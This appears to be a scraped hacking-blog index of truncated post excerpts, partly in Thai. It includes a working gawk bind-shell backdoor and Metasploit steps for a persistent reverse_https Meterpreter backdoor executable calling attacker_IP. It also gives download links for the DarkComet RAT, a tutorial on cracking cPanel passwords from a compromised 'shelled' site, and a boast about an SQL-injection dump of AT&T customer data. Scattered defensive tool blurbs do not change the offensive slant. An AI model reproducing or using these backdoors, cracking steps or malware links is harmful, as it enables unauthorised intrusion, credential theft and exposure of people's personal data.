MultiObfuscator 2.00

Please download this app. from Source.

MultiObfuscator is a professional cryptography tool that offers double
encryption, csprng based scrambling, csprng based whitening, and more.
Documentation provided.


Source: http://packetstormsecurity.org/files/114693

If you like my blog, Please Donate Me




One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00

A Backdoor in gawk by thegrugg

BEGIN {
     port = 8080
     prompt = "bkd> "
     
    service = "/inet/tcp/" port "/0/0"
    while(1){
           do {
                 printf prompt |& service
                 service |& getline cmd
                 if(cmd) {
                       while((cmd |& getline) > 0)
                             print $0 |& service
                       close(cmd)
                 } 
           }

Hacked Joomla! v. [1.6.x] [1.7.x] [2.5.0-2.5.2] - Escalation of Privileges

This vulnerability allows us to escalate privileges joomla for registering a new user, for 1.6.x/1.7.x versions have not been issued so far no patch versions and 1.0.x/1.5.x/2.5.3 + are not vulnerable. but for our comfort the v. 1.5.x (which is not patched) joomla has the well-known bug of the token, you can change the admin pass, well that's another topic.




Let us focus on our own and

Wordpress all Version full Path Disclosure Vulnerability By KinG Of PiraTeS

================================================================================
____ _ _ ____ _ _ ____ _ _ ___ ____ ____
|__| | | |__| |__| |__| |_/ |__] |__| |__/ I Love Palestine
| | |___ |___ | | | | | | | \_ |__] | | | \

================================================================================
##

DNS Changer ทำงานยังไงกันแน่

เป็นประเด็นค่อนข้างมากกับเรื่อง Malware ที่ชือว่า DNS Changer วันนี้ขอหยิบยกมาพูดหน่อยละกันครับ

ก่อนที่จะรู้ว่า DNS Changer ทำงานยังไง เรามาดูก่อนดีกว่าว่า DNS คืออะไรครับ

DNS คืออะไร
โดยปกติแล้วการเข้าไปใช้งานเว็บไซด์ต่างๆ จะไม่ได้ติดต่อกันด้วยชื่อของเว็บไซด์อย่าง www.facebook.com, www.google.com หรอกนะ เพราะการเชื่อมต่อเน็ตเวิร์คต่างๆทำด้วย IP Address ส่วนชื่อเว็บไซด์(domain name)

DarkComet RAT Analyser and Link Download Of DarkComet 5.3.1

This download is the last version of DarkComet RAT 'cause DarkcoderSc (Jean-Pierre LESUEUR) announce he will end developing DarkComet RAT(you can get his announcement here.)

So this post is for who want to download the DarkComet RAT 5.3.1 (The last version that I can find)
http://cyber-store.net/downloads/DarkComet/DarkComet%20-%20v.5.3.1%20FWB.rar
http://199.91.152.33/waavkhu9i5hg/

Interesting exploit, Microsoft IIS 6 , 7.5 FTP Server Remote Denial Of Service

If you want to see the exploit code, please go to the Source.


# Exploit Title: Microsoft IIS 6 , 7.5 FTP Server Remote Denial Of Service (CPU exhaustion)[POC]
# Author: coolkaveh
# coolkaveh@rocketmail.com
# https://twitter.com/coolkaveh
# Vendor Homepage: http://www.microsoft.com
# Version: Microsoft IIS 6 , 7.5 FTP Server
# Tested on: windows server 2008 r2 , seven , with two core

Using beef plugin with Metasploit

1. Run the beef service
$/pentest/web/beef/beef -x -v

2. In another console, Run the Metasploit Console
$msfconsole

3. Download beef plugin from https://github.com/xntrik/beefmetasploitplugin.git
$git clone https://github.com/xntrik/beefmetasploitplugin.git

4. Move file beef.rb to msf/plugins and lib/beef to msf/lib

5. Install hpricot gem
$gem install hpricot

6. In the Metasploit console,

Create Auto reconnect Backdoor With Metasploit

This post will show how to install the autoconnect backdoor in victim machine.

1.  Create the auto reconnect backdoor with metasploit.
msf> use payload/windows/meterpreter/reverse_https
msf> set LHOST attacker_IP
msf> set LPORT binding_port
msf> set SessionCommunicationTimeout 0
msf> set SessionExpirationTimeout 0
msf> generate -t exe -f /var/www/backdoor.exe

2. Binding receiving backdoor

DNSCrypt - encrypts DNS traffic between your computer and OpenDNS

DNSCrypt, as its name suggests, encrypts DNS traffic between your computer and OpenDNS, in the same way SSL turns HTTP traffic into HTTPS encrypted traffic.

Initially, DNSCrypt was announced as being available for Mac only for now, but according to an OpenDNS article posted yesterday, the source code for DNSCrypt was published on GitHub when they've released the Mac preview and even though

Webhoneypot - Web Application Honeypot

DShield.org is offering this honeypot for users to capture automated web application exploits. It is a very simple "semi interactive" honeypot implemented in PHP. 


Source: https://code.google.com/p/webhoneypot/

If you like my blog, Please Donate Me




One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00

WordPress Application Firewall. Protects against current and future attacks.

WordPress Application Firewall. Protects against current and future attacks. Email notification is disabled by default, notification can be activated and configured in Settings > WP WAF. Go to your WP WAF configuration page.


Source: https://wordpress.org/extend/plugins/wp-waf/

If you like my blog, Please Donate Me




One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00

finddomains - discovering domain names/web sites/virtual hosts

FindDomains is a multithreaded search engine discovery tool that will be very useful for penetration testers dealing with discovering domain names/web sites/virtual hosts which are located on too many IP addresses. Provides a console interface so you can easily integrate this tool to your pentest automation system.It retrieves domain names/web sites which are located on specified ip address/

BoNeSi - the DDoS Botnet Simulator

If you want to see demo video of this tool, please go to the Source.

BoNeSi, the DDoS Botnet Simulator is a Tool to simulate Botnet Traffic in a testbed environment on the wire. It is designed to study the effect of DDoS attacks.What traffic can be generated?BoNeSi generates ICMP, UDP and TCP (HTTP) flooding attacks from a defined botnet size (different IP addresses). BoNeSi is highly

Cpanel Cracking Tutorial

Hi guys sorry for such a long Gap !, actually i was on a break so finally i'm back with fresh tutorials . Hope you all will enjoy it .


Things Required :-

• Shelled site
• Cpanel Password Cracker (shell)

Step By Step Tutorial :-

• First open you shell & upload the cpanel password cracker shell . Download the Cpanel password cracker shell from Here .
• Then go down & click on User .

• Now after you have clicked on User, below you will get all the usernames of the Cpanel . So now move to next step, your next step will be to get a good Password list for a Dictionary attack . After getting it you have to copy the username & paste it in the username block (above) & paste the password list in the password block .Then finally click on start .

Tip: Password list should be short & effective .

• After the cracking is finished, in the next page you will see the result . 

• After Getting the login info you can login by going -> www.site.com:2082 . Here you will get the cpanel login area .

Happy Cpanel Cracking Guys ! ;)
Doubts ? Comment !! 

AT&T And Hostgator was hack.

<==============================>Target: ATT.comVulnerable Link: REDACTEDVuln. Type: Error-BasedVulnerable paramater: sb=DB: prod<==============================>Well; it just goes to show you, anything is vulnerable. You just have to know where to look. This DB has A LOT of information in it: names, addresses, mobile numbersect..  The information in this dump isn't even 1% of whats in here, I just

Ind-Hackers Target Umeed.tv

UMEED.TV HACKED BY TH3 D3STROY3R

A Pakistan .tv website named as umeed had been hacked by Indian Hackers group commonly known as T34M DESTROYER ARMY(Th3 D3stroy3r)

As from many days it had been noticed that there is like a Cold War between IND-PAK Black Hat hackers. Everyday more than 100 of sites of both countries are destroyed by hackers group.

It had been guess that the few important data had been destroyed from its database and had also try to harm the whole server, and the site had not been restored even now as whole things are destroyed so it will take time to maintain the site

Browsers Anti-XSS methods in ASP (classic) have been defeated!

If you want to see full article,please go to the Source.

Browsers Anti-XSS methods in ASP (classic) have been defeated!This time, I want to start with the summary section first to break the rules!SummaryThe intention of this paper is to prove the client-side XSS protection methods must have rules for different web application languages, otherwise they will be bypassed. This research is based on

ภัยที่เรียกว่าคนกลาง